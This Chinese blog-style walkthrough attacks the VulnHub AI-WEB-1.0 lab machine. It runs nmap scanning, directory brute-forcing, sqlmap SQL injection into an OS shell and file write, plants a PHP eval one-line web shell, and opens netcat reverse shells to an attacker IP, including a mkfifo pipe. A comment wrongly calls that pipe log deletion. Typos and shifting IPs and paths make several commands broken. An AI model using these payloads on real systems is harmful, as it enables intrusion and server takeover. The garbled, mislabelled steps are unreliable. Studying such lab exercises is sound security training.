# 环境准备
AI-WEB-1.0靶机(192.168.110.36)
//靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/
kali-linux攻击机(192.168.110.72)
# 本次实验使用的是桥接模式,建议大家使用net模式,不然上手难度会提升
主机发现+端口扫描
# 我们使用arp-scan和namp来探测主机信息
arp-scan -l
nmap 192.168.110.0/24 --min-rate=1000
# 发现80端口,然后ping一下,ping通了,我们访问页面看一下有什么东西
目录扫描
# 发现页面没有什么有价值的,那么我们就用dirsearch和dirb进行目录扫描
dirseach-u http://192.168.110.36
dirb http://192.168.110.36 
# 发现有一个robots.txt文件,其他目录什么都没有,然后对其继续扫描
# 扫描出来发现有个php后缀的目录,先留着等候
# 扫描se3reTdir777目录,然后发现有一个留言框
发现SQL注入
# 发现页面有sql注入,那么接下来我们就要对他进行抓包处理
# 我们将抓取的数据包存放在1.txt中,使用sqlmap抓取数据库信息
python3 sqlmap.py -r F:\tools\PentestTools\Tools\VulnerabilityExploitation\sqlmap\1.txt -dbs
# 查询到数据库中表的信息
python3 sqlmap.py -r F:\tools\PentestTools\Tools\VulnerabilityExploitation\sqlmap\1.txt -dbs -D aiweb1 --tables
# 查询到user表中字段信息
python3 sqlmap.py -r F:\tools\PentestTools\Tools\VulnerabilityExploitation\sqlmap\1.txt -dbs -D aiweb1 -T user --columns
# 好像没有我们需要的信息,所以我们从kali攻击机中拿取shell
sqlmap -u "http://192.168.110.72/se3reTdir777/" --data "uid=1&Operation=Submit" --level=3 --os-shell
获取靶机shell
# 拿到shell后,我们制作一句话木马,在文件中传入命名为1.php
<?php @eval($_POST['zx'])?>
# 将木马传入AI-WEB-1.0靶机中
qlmap -u "http://192.168.110.72/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write 1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php
开启服务
# 开启http服务
python -m http.server 7999
# 登录kali网页服务,查看是否存在1.php
http://192.168.110.28:7999/
使用中国蚁剑连接
开启监听端口
# nc反弹连接,不需要再上传文件进行反弹
在kali nc 7777
-l 监听模式,用于入站连接
-v 详细输出--用两个-v可得到更详细的内容
-v 详细输出--用两个-v可得到更详细的内容# 如果7777无法监听,则可以换端口进行监听,这一步提权不稳定,可多次尝试
nc -lvvp 7777
cd /home/www/html/web1x443290o2adf92213/ae3reTdir777/upload/
nc -e /bin/bash 192.168.110.28 7777
# 删除日志
rm /tmp/z;mkfifo/tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.110.139 7777 > /tmp/z
好小子,离成功又近一步!!!!!
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
